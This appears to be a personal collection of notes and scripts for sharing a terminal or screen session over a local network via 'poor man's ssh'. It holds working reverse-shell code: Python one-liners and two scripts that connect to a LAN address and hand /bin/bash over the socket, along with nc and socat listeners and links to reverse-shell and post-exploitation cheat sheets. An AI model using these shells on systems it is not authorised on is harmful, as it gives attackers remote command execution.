poor-mans-ssh.sh

# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

# on the CLIENT, run the following:
#   nc -l 12345

# on the SERVER, start the "reverse shell"
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')" 192.168.2.176 12345

# now go to the CLIENT, listen on port 12345 for incoming shell connections
nc -l 12345

# that worked, but note that 'nc' does a terrible job emulating a tty 
# (arrows keys aren't sent correctly, don't even try launching vim)
# instead, let's install socat, a smarter netcat, via "sudo apt-get install socat" or "brew install socat"

# launch socat, asking it to to talk forward all traffic on 12345 to /dev/ttys003 (raw,echo=0 fix tty issues)
socat `tty`,raw,echo=0 tcp-listen:12345

# enjoy

##
## with gnu screen, to get share a screen session on the network
##

# first ensure you are in a screen session
screen -R

# now start a python job to share it in the background
python -c "import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(['/usr/bin/screen', '-x'])" 192.168.2.176 12345 &

# when either party logs out of the screen session (via CTRL-d), the python is killed and the socket is closed

##
## poor man's screencast - adapted from http://mrnugget.github.io/blog/2013/08/11/named-pipes/
## assumes your friend on 192.168.2.183 runs "nc -l 9999"
## then you can stream the contents of your terminal (read-only!) to him as follows:
## bonus trick: if you want to save your friend's otherise discarded keystrokes, redirect to a file instead of /dev/null
##
script -t 0 >(nc 192.168.2.183 9999 > /dev/null)  

resources.md

• http://www.ping.eti.br/docs/01/13.txt | "Random Shell Tricks by Teh Crew" - mini hacking guide
• http://pentestmonkey.net/blog/post-exploitation-without-a-tty | Post-Exploitation Without A TTY | pentestmonkey
• http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet | Reverse Shell Cheat Sheet | pentestmonkey
• http://bernardodamele.blogspot.ca/2011/09/reverse-shells-one-liners.html | Reverse shells one-liners
• http://serverfault.com/questions/102277/getting-a-tty-in-a-connectback-shell | linux - Getting a TTY in a Connectback Shell - Server Fault
• http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLE_OPTION_CTTY | socat
• http://www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt | www.dest-unreach.org/socat/doc/socat-ttyovertcp.txt
• http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES | stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES
• http://superuser.com/questions/123790/socat-and-rich-terminals-with-ctrlc-ctrlz-ctrld-propagation | linux - Socat and rich terminals (with Ctrl+C/Ctrl+Z/Ctrl+D propagation) - Super User
• http://blog.rootshell.ir/2010/08/get-your-interactive-reverse-shell-on-a-webhost/ | Get Your Interactive Reverse Shell on a Webhost | The #Shell

TODO:

• fix 80 character window limit (see http://sqizit.bartletts.id.au/2011/02/14/pseudo-terminals-in-python/)
• auto-kill spawned processes (not clear whether or not this is a problem..., check ps aux | grep bash after python quits)
• find a way to get python to print out the shell session to host terminal too (ask Vasi?)
  • http://docs.python.org/dev/library/pty.html#pty.spawn
  • http://opensource.apple.com/source/python/python-3/python/Lib/pty.py?txt
  • http://coshell.googlecode.com/svn/trunk/coshell.py

share.py

import sys,socket,os,fcntl,struct,pty,termios
 
count = 0
def fix_window_size(fd):
    global count
    if count == 0:
      count = 1
    zeroes = struct.pack('HHHH', 0, 0, 0, 0)
    size_info = fcntl.ioctl(1, termios.TIOCGWINSZ, zeroes)
    rows, cols = struct.unpack('HHHH', size_info)[0:2]
    size_info = struct.pack('HHHH', rows, cols, 0, 0)
    fcntl.ioctl(fd, termios.TIOCSWINSZ, size_info)
 
_,ip,port=sys.argv
 
s = socket.socket()
s.connect((ip,int(port)))
os.dup2(s.fileno(),0)
 
def socket_read(fd):
    fix_window_size(fd)
    data = os.read(fd, 1024)
    os.write(s.fileno(),data)
    return data
 
pty.spawn(['/bin/bash','-i'], socket_read)

share2.py

import sys,socket,os,fcntl,termios,array,select

_,ip,port=sys.argv

print "Opening connection..."
remote = socket.socket()
remote.connect((ip,int(port)))

print "Launching bash..."
pid, fd = os.forkpty()
if pid == 0: # CHILD
    os.execlp('/bin/bash', '-i')

# fix window size
buf = array.array('h', [0, 0, 0, 0])
fcntl.ioctl(sys.stdout.fileno(), termios.TIOCGWINSZ, buf, True)
fcntl.ioctl(fd, termios.TIOCSWINSZ, buf)

print "Starting loop..."
while 1:
    avail,_,_ = select.select([fd,remote,sys.stdin], [], [])
    if fd in avail:
        data = os.read(fd, 1024)
        os.write(remote.fileno(),data)
        os.write(sys.stdout.fileno(), data)
    if remote in avail:
        data = os.read(remote.fileno(), 1024)
        os.write(fd, data)
    if sys.stdin in avail:
        data = os.read(sys.stdin.fileno(), 1024)
        os.write(fd, data)